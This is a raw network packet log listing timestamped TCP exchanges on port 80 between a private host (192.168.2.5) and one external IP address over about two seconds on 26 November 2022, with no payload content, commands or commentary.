Nov 26, 2022 11:17:40.130959034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130965948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.130985975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.130989075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131014109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131014109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131040096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131043911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131061077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131067991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131089926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131095886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131115913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131120920 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131141901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131141901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131165028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131171942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131192923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131195068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131217003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131220102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131242990 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131247044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131268024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131273031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131290913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131299019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131320953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131325006 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131347895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131347895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131373882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131375074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131398916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131400108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131423950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131424904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131448984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131452084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131477118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131479025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131501913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131501913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131525993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131534100 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131551981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131553888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131576061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131580114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131606102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131608963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131633043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131634951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131659031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131664038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131678104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131688118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131710052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131712914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131736994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131740093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131758928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131766081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131788015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131792068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131813049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131824017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131839991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131851912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131867886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131870985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131907940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131908894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131921053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131938934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131962061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.131963968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131985903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.131989956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132014036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132015944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132042885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132045031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132064104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132076979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132102013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132107973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132131100 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132132053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132157087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132160902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132177114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132189989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132210016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132219076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132240057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132247925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132270098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132277012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132299900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132307053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132330894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132334948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132361889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132364988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132385015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132394075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132414103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132424116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132447958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132452011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132473946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132483006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132503033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132513046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132531881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132541895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132559061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132572889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132586002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132603884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132616997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132633924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132652044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132654905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132679939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132690907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132703066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132709980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132736921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132738113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132764101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132766962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132795095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132795095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132821083 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132826090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132847071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132854939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132879972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132884026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132910013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132911921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132936001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132940054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132965088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.132970095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.132989883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133001089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133022070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133030891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133057117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133058071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133081913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133086920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133109093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133116961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133135080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133147955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133173943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133173943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133198977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133202076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133229017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133232117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133260012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133260012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133284092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133291006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133315086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133321047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133347034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133348942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133371115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133378029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133399963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133402109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133430004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133435011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133450031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133460999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133486032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133487940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133507013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133517981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133543968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133544922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133572102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133575916 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133600950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133603096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133625984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133635998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133655071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133665085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133686066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133693933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133718967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133721113 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133744955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133750916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133771896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133780956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133802891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133809090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133829117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133838892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133855104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133868933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133889914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133897066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133922100 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133923054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133950949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133951902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.133965015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.133982897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134007931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134008884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134035110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134056091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134066105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134066105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134085894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134093046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134108067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134114981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134136915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134139061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134161949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134162903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134191036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134191990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134210110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134221077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134246111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134249926 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134265900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134272099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134294033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134315014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134330034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134341955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134362936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134371042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134377003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134402990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134421110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134430885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134454966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134460926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.134481907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.134849072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.156002998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.156033993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.156058073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.156080961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.156105042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.156131983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.156155109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:40.156161070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.156161070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:40.156200886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.882133007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.940195084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.940447092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.940495968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.940541983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.940610886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.940627098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.940676928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.940722942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.940773964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.940802097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.940820932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.940846920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.940887928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.940932035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.940936089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.940975904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941019058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941035986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.941062927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941106081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941122055 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.941150904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941179037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.941199064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941241980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941284895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941301107 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.941329002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941348076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.941371918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941415071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941433907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.941457987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941503048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941524029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.941546917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941623926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941649914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941689014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941729069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941766024 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.941773891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941783905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.941814899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941857100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941869974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.941899061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941941977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.941955090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.941986084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942028046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942044020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.942069054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942111015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942122936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.942152023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942193985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942234993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942250013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.942279100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942321062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942334890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.942362070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942404032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942414999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.942446947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942488909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942500114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.942531109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942573071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942584038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.942615032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942656994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:41.942667961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:41.942698956 CET	80	49707	66.235.200.147	192.168.2.5
